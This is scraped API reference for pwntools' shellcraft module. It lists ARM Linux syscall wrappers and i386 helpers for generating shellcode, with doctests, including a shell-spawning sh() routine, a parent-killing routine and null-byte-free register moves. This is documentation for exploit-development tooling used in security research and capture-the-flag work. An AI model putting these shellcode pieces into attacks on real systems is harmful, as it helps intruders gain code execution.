(fd, request, vararg)[source]¶ Invokes the syscall ioctl. See ‘man 2 ioctl’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
ioperm
(from_, num, turn_on)[source]¶ Invokes the syscall ioperm. See ‘man 2 ioperm’ for more information.
Parameters: - from (unsigned) – from
- num (unsigned) – num
- turn_on (int) – turn_on
-
pwnlib.shellcraft.arm.linux.
iopl
(level)[source]¶ Invokes the syscall iopl. See ‘man 2 iopl’ for more information.
Parameters: level (int) – level
-
pwnlib.shellcraft.arm.linux.
kill
(pid, sig)[source]¶ Invokes the syscall kill. See ‘man 2 kill’ for more information.
Parameters: - pid (pid_t) – pid
- sig (int) – sig
-
pwnlib.shellcraft.arm.linux.
killparent
()[source]¶ Kills its parent process until whatever the parent is (probably init) cannot be killed any longer.
-
pwnlib.shellcraft.arm.linux.
lchown
(file, owner, group)[source]¶ Invokes the syscall lchown. See ‘man 2 lchown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.arm.linux.
link
(from_, to)[source]¶ Invokes the syscall link. See ‘man 2 link’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.arm.linux.
linkat
(fromfd, from_, tofd, to, flags)[source]¶ Invokes the syscall linkat. See ‘man 2 linkat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
listen
(fd, n)[source]¶ Invokes the syscall listen. See ‘man 2 listen’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
lseek
(fd, offset, whence)[source]¶ Invokes the syscall lseek. See ‘man 2 lseek’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
lstat
(file, buf)[source]¶ Invokes the syscall lstat. See ‘man 2 lstat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.arm.linux.
lstat64
(file, buf)[source]¶ Invokes the syscall lstat64. See ‘man 2 lstat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.arm.linux.
madvise
(addr, length, advice)[source]¶ Invokes the syscall madvise. See ‘man 2 madvise’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- advice (int) – advice
-
pwnlib.shellcraft.arm.linux.
mincore
(start, length, vec)[source]¶ Invokes the syscall mincore. See ‘man 2 mincore’ for more information.
Parameters: - start (void) – start
- len (size_t) – len
- vec (unsigned) – vec
-
pwnlib.shellcraft.arm.linux.
mkdir
(path, mode)[source]¶ Invokes the syscall mkdir. See ‘man 2 mkdir’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.arm.linux.
mkdirat
(fd, path, mode)[source]¶ Invokes the syscall mkdirat. See ‘man 2 mkdirat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.arm.linux.
mknod
(path, mode, dev)[source]¶ Invokes the syscall mknod. See ‘man 2 mknod’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.arm.linux.
mknodat
(fd, path, mode, dev)[source]¶ Invokes the syscall mknodat. See ‘man 2 mknodat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.arm.linux.
mlock
(addr, length)[source]¶ Invokes the syscall mlock. See ‘man 2 mlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
mlockall
(flags)[source]¶ Invokes the syscall mlockall. See ‘man 2 mlockall’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.arm.linux.
mmap
(addr=0, length=4096, prot=7, flags=34, fd=-1, offset=0)[source]¶ Invokes the syscall mmap. See ‘man 2 mmap’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
mprotect
(addr, length, prot)[source]¶ Invokes the syscall mprotect. See ‘man 2 mprotect’ for more information.
Parameters: - addr (void) – addr
- length (size_t) – length
- prot (int) – prot
-
pwnlib.shellcraft.arm.linux.
mq_notify
(mqdes, notification)[source]¶ Invokes the syscall mq_notify. See ‘man 2 mq_notify’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- notification (sigevent) – notification
-
pwnlib.shellcraft.arm.linux.
mq_open
(name, oflag, vararg)[source]¶ Invokes the syscall mq_open. See ‘man 2 mq_open’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
mq_timedreceive
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedreceive. See ‘man 2 mq_timedreceive’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.arm.linux.
mq_timedsend
(mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)[source]¶ Invokes the syscall mq_timedsend. See ‘man 2 mq_timedsend’ for more information.
Parameters: - mqdes (mqd_t) – mqdes
- msg_ptr (char) – msg_ptr
- msg_len (size_t) – msg_len
- msg_prio (unsigned) – msg_prio
- abs_timeout (timespec) – abs_timeout
-
pwnlib.shellcraft.arm.linux.
mq_unlink
(name)[source]¶ Invokes the syscall mq_unlink. See ‘man 2 mq_unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.arm.linux.
mremap
(addr, old_len, new_len, flags, vararg)[source]¶ Invokes the syscall mremap. See ‘man 2 mremap’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
msync
(addr, length, flags)[source]¶ Invokes the syscall msync. See ‘man 2 msync’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- flags (int) – flags
-
pwnlib.shellcraft.arm.linux.
munlock
(addr, length)[source]¶ Invokes the syscall munlock. See ‘man 2 munlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
munlockall
()[source]¶ Invokes the syscall munlockall. See ‘man 2 munlockall’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
munmap
(addr, length)[source]¶ Invokes the syscall munmap. See ‘man 2 munmap’ for more information.
Parameters: - addr (void) – addr
- length (size_t) – length
-
pwnlib.shellcraft.arm.linux.
nanosleep
(requested_time, remaining)[source]¶ Invokes the syscall nanosleep. See ‘man 2 nanosleep’ for more information.
Parameters: - requested_time (timespec) – requested_time
- remaining (timespec) – remaining
-
pwnlib.shellcraft.arm.linux.
nice
(inc)[source]¶ Invokes the syscall nice. See ‘man 2 nice’ for more information.
Parameters: inc (int) – inc
-
pwnlib.shellcraft.arm.linux.
open
(file, oflag, vararg)[source]¶ Invokes the syscall open. See ‘man 2 open’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
open_file
(filepath, flags='O_RDONLY', mode=420)[source]¶ Opens a file. Leaves the file descriptor in r0.
Parameters: - filepath (str) – The file to open.
- flags (int/str) – The flags to call open with.
- mode (int/str) – The attribute to create the flag. Only matters of
flags & O_CREAT
is set.
-
pwnlib.shellcraft.arm.linux.
openat
(fd, file, oflag, vararg)[source]¶ Invokes the syscall openat. See ‘man 2 openat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
pause
()[source]¶ Invokes the syscall pause. See ‘man 2 pause’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
pipe
(pipedes)[source]¶ Invokes the syscall pipe. See ‘man 2 pipe’ for more information.
Parameters: pipedes (int) – pipedes
-
pwnlib.shellcraft.arm.linux.
pipe2
(pipedes, flags)[source]¶ Invokes the syscall pipe2. See ‘man 2 pipe2’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
poll
(fds, nfds, timeout)[source]¶ Invokes the syscall poll. See ‘man 2 poll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (int) – timeout
-
pwnlib.shellcraft.arm.linux.
ppoll
(fds, nfds, timeout, ss)[source]¶ Invokes the syscall ppoll. See ‘man 2 ppoll’ for more information.
Parameters: - fds (pollfd) – fds
- nfds (nfds_t) – nfds
- timeout (timespec) – timeout
- ss (sigset_t) – ss
-
pwnlib.shellcraft.arm.linux.
prctl
(option, *vararg)[source]¶ Invokes the syscall prctl. See ‘man 2 prctl’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
pread
(fd, buf, nbytes, offset)[source]¶ Invokes the syscall pread. See ‘man 2 pread’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
- offset (off_t) – offset
-
pwnlib.shellcraft.arm.linux.
preadv
(fd, iovec, count, offset)[source]¶ Invokes the syscall preadv. See ‘man 2 preadv’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
prlimit64
(pid, resource, new_limit, old_limit)[source]¶ Invokes the syscall prlimit64. See ‘man 2 prlimit64’ for more information.
Parameters: - pid (pid_t) – pid
- resource (rlimit_resource) – resource
- new_limit (rlimit64) – new_limit
- old_limit (rlimit64) – old_limit
-
pwnlib.shellcraft.arm.linux.
profil
(sample_buffer, size, offset, scale)[source]¶ Invokes the syscall profil. See ‘man 2 profil’ for more information.
Parameters: - sample_buffer (unsigned) – sample_buffer
- size (size_t) – size
- offset (size_t) – offset
- scale (unsigned) – scale
-
pwnlib.shellcraft.arm.linux.
ptrace
(request, *vararg)[source]¶ Invokes the syscall ptrace. See ‘man 2 ptrace’ for more information.
Parameters: - request (ptrace_request) – request
- vararg (int) – vararg
-
pwnlib.shellcraft.arm.linux.
putpmsg
(fildes, ctlptr, dataptr, band, flags)[source]¶ Invokes the syscall putpmsg. See ‘man 2 putpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
pwrite
(fd, buf, n, offset)[source]¶ Invokes the syscall pwrite. See ‘man 2 pwrite’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- n (size_t) – n
- offset (off_t) – offset
-
pwnlib.shellcraft.arm.linux.
pwritev
(fd, iovec, count, offset)[source]¶ Invokes the syscall pwritev. See ‘man 2 pwritev’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
read
(fd, buf, nbytes)[source]¶ Invokes the syscall read. See ‘man 2 read’ for more information.
Parameters: - fd (int) – fd
- buf (void) – buf
- nbytes (size_t) – nbytes
-
pwnlib.shellcraft.arm.linux.
readahead
(fd, offset, count)[source]¶ Invokes the syscall readahead. See ‘man 2 readahead’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (size_t) – count
-
pwnlib.shellcraft.arm.linux.
readdir
(dirp)[source]¶ Invokes the syscall readdir. See ‘man 2 readdir’ for more information.
Parameters: dirp (DIR) – dirp
-
pwnlib.shellcraft.arm.linux.
readlink
(path, buf, length)[source]¶ Invokes the syscall readlink. See ‘man 2 readlink’ for more information.
Parameters: - path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
readlinkat
(fd, path, buf, length)[source]¶ Invokes the syscall readlinkat. See ‘man 2 readlinkat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- buf (char) – buf
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
readv
(fd, iovec, count)[source]¶ Invokes the syscall readv. See ‘man 2 readv’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
recv
(fd, buf, n, flags)[source]¶ Invokes the syscall recv. See ‘man 2 recv’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
recvfrom
(fd, buf, n, flags, addr, addr_len)[source]¶ Invokes the syscall recvfrom. See ‘man 2 recvfrom’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
recvmmsg
(fd, vmessages, vlen, flags, tmo)[source]¶ Invokes the syscall recvmmsg. See ‘man 2 recvmmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
recvmsg
(fd, message, flags)[source]¶ Invokes the syscall recvmsg. See ‘man 2 recvmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
remap_file_pages
(start, size, prot, pgoff, flags)[source]¶ Invokes the syscall remap_file_pages. See ‘man 2 remap_file_pages’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
rename
(old, new)[source]¶ Invokes the syscall rename. See ‘man 2 rename’ for more information.
Parameters: - old (char) – old
- new (char) – new
-
pwnlib.shellcraft.arm.linux.
renameat
(oldfd, old, newfd, new)[source]¶ Invokes the syscall renameat. See ‘man 2 renameat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
rmdir
(path)[source]¶ Invokes the syscall rmdir. See ‘man 2 rmdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.arm.linux.
sched_get_priority_max
(algorithm)[source]¶ Invokes the syscall sched_get_priority_max. See ‘man 2 sched_get_priority_max’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.arm.linux.
sched_get_priority_min
(algorithm)[source]¶ Invokes the syscall sched_get_priority_min. See ‘man 2 sched_get_priority_min’ for more information.
Parameters: algorithm (int) – algorithm
-
pwnlib.shellcraft.arm.linux.
sched_getaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_getaffinity. See ‘man 2 sched_getaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.arm.linux.
sched_getparam
(pid, param)[source]¶ Invokes the syscall sched_getparam. See ‘man 2 sched_getparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.arm.linux.
sched_getscheduler
(pid)[source]¶ Invokes the syscall sched_getscheduler. See ‘man 2 sched_getscheduler’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.arm.linux.
sched_rr_get_interval
(pid, t)[source]¶ Invokes the syscall sched_rr_get_interval. See ‘man 2 sched_rr_get_interval’ for more information.
Parameters: - pid (pid_t) – pid
- t (timespec) – t
-
pwnlib.shellcraft.arm.linux.
sched_setaffinity
(pid, cpusetsize, cpuset)[source]¶ Invokes the syscall sched_setaffinity. See ‘man 2 sched_setaffinity’ for more information.
Parameters: - pid (pid_t) – pid
- cpusetsize (size_t) – cpusetsize
- cpuset (cpu_set_t) – cpuset
-
pwnlib.shellcraft.arm.linux.
sched_setparam
(pid, param)[source]¶ Invokes the syscall sched_setparam. See ‘man 2 sched_setparam’ for more information.
Parameters: - pid (pid_t) – pid
- param (sched_param) – param
-
pwnlib.shellcraft.arm.linux.
sched_setscheduler
(pid, policy, param)[source]¶ Invokes the syscall sched_setscheduler. See ‘man 2 sched_setscheduler’ for more information.
Parameters: - pid (pid_t) – pid
- policy (int) – policy
- param (sched_param) – param
-
pwnlib.shellcraft.arm.linux.
sched_yield
()[source]¶ Invokes the syscall sched_yield. See ‘man 2 sched_yield’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
select
(nfds, readfds, writefds, exceptfds, timeout)[source]¶ Invokes the syscall select. See ‘man 2 select’ for more information.
Parameters: - nfds (int) – nfds
- readfds (fd_set) – readfds
- writefds (fd_set) – writefds
- exceptfds (fd_set) – exceptfds
- timeout (timeval) – timeout
-
pwnlib.shellcraft.arm.linux.
sendfile
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile. See ‘man 2 sendfile’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
sendfile64
(out_fd, in_fd, offset, count)[source]¶ Invokes the syscall sendfile64. See ‘man 2 sendfile64’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
setdomainname
(name, length)[source]¶ Invokes the syscall setdomainname. See ‘man 2 setdomainname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
setgid
(gid)[source]¶ Invokes the syscall setgid. See ‘man 2 setgid’ for more information.
Parameters: gid (gid_t) – gid
-
pwnlib.shellcraft.arm.linux.
setgroups
(n, groups)[source]¶ Invokes the syscall setgroups. See ‘man 2 setgroups’ for more information.
Parameters: - n (size_t) – n
- groups (gid_t) – groups
-
pwnlib.shellcraft.arm.linux.
sethostname
(name, length)[source]¶ Invokes the syscall sethostname. See ‘man 2 sethostname’ for more information.
Parameters: - name (char) – name
- len (size_t) – len
-
pwnlib.shellcraft.arm.linux.
setitimer
(which, new, old)[source]¶ Invokes the syscall setitimer. See ‘man 2 setitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- new (itimerval) – new
- old (itimerval) – old
-
pwnlib.shellcraft.arm.linux.
setpgid
(pid, pgid)[source]¶ Invokes the syscall setpgid. See ‘man 2 setpgid’ for more information.
Parameters: - pid (pid_t) – pid
- pgid (pid_t) – pgid
-
pwnlib.shellcraft.arm.linux.
setpriority
(which, who, prio)[source]¶ Invokes the syscall setpriority. See ‘man 2 setpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
- prio (int) – prio
-
pwnlib.shellcraft.arm.linux.
setregid
(rgid, egid)[source]¶ Invokes the syscall setregid. See ‘man 2 setregid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
-
pwnlib.shellcraft.arm.linux.
setresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall setresgid. See ‘man 2 setresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.arm.linux.
setresuid
(ruid, euid, suid)[source]¶ Invokes the syscall setresuid. See ‘man 2 setresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.arm.linux.
setreuid
(ruid, euid)[source]¶ Invokes the syscall setreuid. See ‘man 2 setreuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
-
pwnlib.shellcraft.arm.linux.
setrlimit
(resource, rlimits)[source]¶ Invokes the syscall setrlimit. See ‘man 2 setrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.arm.linux.
setsid
()[source]¶ Invokes the syscall setsid. See ‘man 2 setsid’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
setsockopt
(sockfd, level, optname, optval, optlen)[source]¶ Invokes the syscall setsockopt. See ‘man 2 setsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
setsockopt_timeout
(sock, secs)[source]¶ Invokes the syscall for setsockopt with specified timeout. See ‘man 2 setsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
settimeofday
(tv, tz)[source]¶ Invokes the syscall settimeofday. See ‘man 2 settimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone) – tz
-
pwnlib.shellcraft.arm.linux.
setuid
(uid)[source]¶ Invokes the syscall setuid. See ‘man 2 setuid’ for more information.
Parameters: uid (uid_t) – uid
-
pwnlib.shellcraft.arm.linux.
sh
()[source]¶ Execute a different process.
>>> p = run_assembly(shellcraft.arm.linux.sh()) >>> p.sendline('echo Hello') >>> p.recv() 'Hello\n'
-
pwnlib.shellcraft.arm.linux.
sigaction
(sig, act, oact)[source]¶ Invokes the syscall sigaction. See ‘man 2 sigaction’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
sigaltstack
(ss, oss)[source]¶ Invokes the syscall sigaltstack. See ‘man 2 sigaltstack’ for more information.
Parameters: - ss (sigaltstack) – ss
- oss (sigaltstack) – oss
-
pwnlib.shellcraft.arm.linux.
signal
(sig, handler)[source]¶ Invokes the syscall signal. See ‘man 2 signal’ for more information.
Parameters: - sig (int) – sig
- handler (sighandler_t) – handler
-
pwnlib.shellcraft.arm.linux.
sigpending
(set)[source]¶ Invokes the syscall sigpending. See ‘man 2 sigpending’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.arm.linux.
sigprocmask
(how, set, oset)[source]¶ Invokes the syscall sigprocmask. See ‘man 2 sigprocmask’ for more information.
Parameters: - how (int) – how
- set (sigset_t) – set
- oset (sigset_t) – oset
-
pwnlib.shellcraft.arm.linux.
sigreturn
()[source]¶ Invokes the syscall sigreturn. See ‘man 2 sigreturn’ for more information.
-
pwnlib.shellcraft.arm.linux.
sigsuspend
(set)[source]¶ Invokes the syscall sigsuspend. See ‘man 2 sigsuspend’ for more information.
Parameters: set (sigset_t) – set
-
pwnlib.shellcraft.arm.linux.
splice
(fdin, offin, fdout, offout, length, flags)[source]¶ Invokes the syscall splice. See ‘man 2 splice’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
stat
(file, buf)[source]¶ Invokes the syscall stat. See ‘man 2 stat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.arm.linux.
stat64
(file, buf)[source]¶ Invokes the syscall stat64. See ‘man 2 stat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.arm.linux.
stime
(when)[source]¶ Invokes the syscall stime. See ‘man 2 stime’ for more information.
Parameters: when (time_t) – when
-
pwnlib.shellcraft.arm.linux.
stty
(fd, params)[source]¶ Invokes the syscall stty. See ‘man 2 stty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.arm.linux.
symlink
(from_, to)[source]¶ Invokes the syscall symlink. See ‘man 2 symlink’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.arm.linux.
symlinkat
(from_, tofd, to)[source]¶ Invokes the syscall symlinkat. See ‘man 2 symlinkat’ for more information.
Parameters: - from (char) – from
- tofd (int) – tofd
- to (char) – to
-
pwnlib.shellcraft.arm.linux.
sync
()[source]¶ Invokes the syscall sync. See ‘man 2 sync’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
sync_file_range
(fd, offset, count, flags)[source]¶ Invokes the syscall sync_file_range. See ‘man 2 sync_file_range’ for more information.
Parameters: - fd (int) – fd
- offset (off64_t) – offset
- count (off64_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.arm.linux.
syscall
(syscall=None, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None, arg6=None)[source]¶ - Args: [syscall_number, *args]
- Does a syscall
Any of the arguments can be expressions to be evaluated by
pwnlib.constants.eval()
.Example
>>> print shellcraft.arm.linux.syscall(11, 1, 'sp', 2, 0).rstrip() /* call syscall(11, 1, 'sp', 2, 0) */ mov r0, #1 mov r1, sp mov r2, #2 eor r3, r3 /* 0 (#0) */ mov r7, #0xb svc 0 >>> print shellcraft.arm.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ eor r0, r0 /* 0 (#0) */ mov r7, #(SYS_exit) /* 1 */ svc 0
-
pwnlib.shellcraft.arm.linux.
syslog
(pri, fmt, vararg)[source]¶ Invokes the syscall syslog. See ‘man 2 syslog’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
tee
(fdin, fdout, length, flags)[source]¶ Invokes the syscall tee. See ‘man 2 tee’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
time
(timer)[source]¶ Invokes the syscall time. See ‘man 2 time’ for more information.
Parameters: timer (time_t) – timer
-
pwnlib.shellcraft.arm.linux.
timer_create
(clock_id, evp, timerid)[source]¶ Invokes the syscall timer_create. See ‘man 2 timer_create’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- evp (sigevent) – evp
- timerid (timer_t) – timerid
-
pwnlib.shellcraft.arm.linux.
timer_delete
(timerid)[source]¶ Invokes the syscall timer_delete. See ‘man 2 timer_delete’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.arm.linux.
timer_getoverrun
(timerid)[source]¶ Invokes the syscall timer_getoverrun. See ‘man 2 timer_getoverrun’ for more information.
Parameters: timerid (timer_t) – timerid
-
pwnlib.shellcraft.arm.linux.
timer_gettime
(timerid, value)[source]¶ Invokes the syscall timer_gettime. See ‘man 2 timer_gettime’ for more information.
Parameters: - timerid (timer_t) – timerid
- value (itimerspec) – value
-
pwnlib.shellcraft.arm.linux.
timer_settime
(timerid, flags, value, ovalue)[source]¶ Invokes the syscall timer_settime. See ‘man 2 timer_settime’ for more information.
Parameters: - timerid (timer_t) – timerid
- flags (int) – flags
- value (itimerspec) – value
- ovalue (itimerspec) – ovalue
-
pwnlib.shellcraft.arm.linux.
truncate
(file, length)[source]¶ Invokes the syscall truncate. See ‘man 2 truncate’ for more information.
Parameters: - file (char) – file
- length (off_t) – length
-
pwnlib.shellcraft.arm.linux.
truncate64
(file, length)[source]¶ Invokes the syscall truncate64. See ‘man 2 truncate64’ for more information.
Parameters: - file (char) – file
- length (off64_t) – length
-
pwnlib.shellcraft.arm.linux.
ulimit
(cmd, vararg)[source]¶ Invokes the syscall ulimit. See ‘man 2 ulimit’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
umask
(mask)[source]¶ Invokes the syscall umask. See ‘man 2 umask’ for more information.
Parameters: mask (mode_t) – mask
-
pwnlib.shellcraft.arm.linux.
uname
(name)[source]¶ Invokes the syscall uname. See ‘man 2 uname’ for more information.
Parameters: name (utsname) – name
-
pwnlib.shellcraft.arm.linux.
unlink
(name)[source]¶ Invokes the syscall unlink. See ‘man 2 unlink’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.arm.linux.
unlinkat
(fd, name, flag)[source]¶ Invokes the syscall unlinkat. See ‘man 2 unlinkat’ for more information.
Parameters:
Invokes the syscall unshare. See ‘man 2 unshare’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.arm.linux.
ustat
(dev, ubuf)[source]¶ Invokes the syscall ustat. See ‘man 2 ustat’ for more information.
Parameters: - dev (dev_t) – dev
- ubuf (ustat) – ubuf
-
pwnlib.shellcraft.arm.linux.
utime
(file, file_times)[source]¶ Invokes the syscall utime. See ‘man 2 utime’ for more information.
Parameters: - file (char) – file
- file_times (utimbuf) – file_times
-
pwnlib.shellcraft.arm.linux.
utimensat
(fd, path, times, flags)[source]¶ Invokes the syscall utimensat. See ‘man 2 utimensat’ for more information.
Parameters:
-
pwnlib.shellcraft.arm.linux.
utimes
(file, tvp)[source]¶ Invokes the syscall utimes. See ‘man 2 utimes’ for more information.
Parameters: - file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.arm.linux.
vfork
()[source]¶ Invokes the syscall vfork. See ‘man 2 vfork’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
vhangup
()[source]¶ Invokes the syscall vhangup. See ‘man 2 vhangup’ for more information.
Arguments:
-
pwnlib.shellcraft.arm.linux.
vmsplice
(fdout, iov, count, flags)[source]¶ Invokes the syscall vmsplice. See ‘man 2 vmsplice’ for more information.
Parameters: - fdout (int) – fdout
- iov (iovec) – iov
- count (size_t) – count
- flags (unsigned) – flags
-
pwnlib.shellcraft.arm.linux.
wait4
(pid, stat_loc, options, usage)[source]¶ Invokes the syscall wait4. See ‘man 2 wait4’ for more information.
Parameters: - pid (pid_t) – pid
- stat_loc (WAIT_STATUS) – stat_loc
- options (int) – options
- usage (rusage) – usage
-
pwnlib.shellcraft.arm.linux.
waitid
(idtype, id, infop, options)[source]¶ Invokes the syscall waitid. See ‘man 2 waitid’ for more information.
Parameters: - idtype (idtype_t) – idtype
- id (id_t) – id
- infop (siginfo_t) – infop
- options (int) – options
-
pwnlib.shellcraft.arm.linux.
waitpid
(pid, stat_loc, options)[source]¶ Invokes the syscall waitpid. See ‘man 2 waitpid’ for more information.
Parameters:
pwnlib.shellcraft.common
— Shellcode common to all architecture¶
Shellcraft module containing shellcode common to all platforms.
pwnlib.shellcraft.i386
— Shellcode for Intel 80386¶
pwnlib.shellcraft.i386
¶
Shellcraft module containing generic Intel i386 shellcodes.
-
pwnlib.shellcraft.i386.
crash
()[source]¶ Crash.
Example
>>> run_assembly(shellcraft.crash()).poll(True) -11
-
pwnlib.shellcraft.i386.
epilog
(nargs=0)[source]¶ Function epilogue.
Parameters: nargs (int) – Number of arguments to pop off the stack.
-
pwnlib.shellcraft.i386.
function
(name, template_function, *registers)[source]¶ Converts a shellcraft template into a callable function.
Parameters: >>> shellcode = '' >>> shellcode += shellcraft.function('write', shellcraft.i386.linux.write, ) >>> hello = shellcraft.i386.linux.echo("Hello!", 'eax') >>> hello_fn = shellcraft.i386.function(hello, 'eax').strip() >>> exit = shellcraft.i386.linux.exit('edi') >>> exit_fn = shellcraft.i386.function(exit, 'edi').strip() >>> shellcode = ''' ... push STDOUT_FILENO ... call hello ... push 33 ... call exit ... hello: ... %(hello_fn)s ... exit: ... %(exit_fn)s ... ''' % (locals()) >>> p = run_assembly(shellcode) >>> p.recvall() 'Hello!' >>> p.wait_for_close() >>> p.poll() 33
Notes
Can only be used on a shellcraft template which takes all of its arguments as registers. For example, the pushstr
-
pwnlib.shellcraft.i386.
getpc
(register='ecx')[source]¶ Retrieves the value of EIP, stores it in the desired register.
Parameters: return_value – Value to return
-
pwnlib.shellcraft.i386.
itoa
(v, buffer='esp', allocate_stack=True)[source]¶ Converts an integer into its string representation, and pushes it onto the stack.
Parameters: - v (str, int) – Integer constant or register that contains the value to convert.
- alloca –
Example
>>> sc = shellcraft.i386.mov('eax', 0xdeadbeef) >>> sc += shellcraft.i386.itoa('eax') >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) >>> run_assembly(sc).recvuntil('\x00') '3735928559\x00'
-
pwnlib.shellcraft.i386.
memcpy
(dest, src, n)[source]¶ Copies memory.
Parameters: - dest – Destination address
- src – Source address
- n – Number of bytes
-
pwnlib.shellcraft.i386.
mov
(dest, src, stack_allowed=True)[source]¶ Move src into dest without newlines and null bytes.
If the src is a register smaller than the dest, then it will be zero-extended to fit inside the larger register.
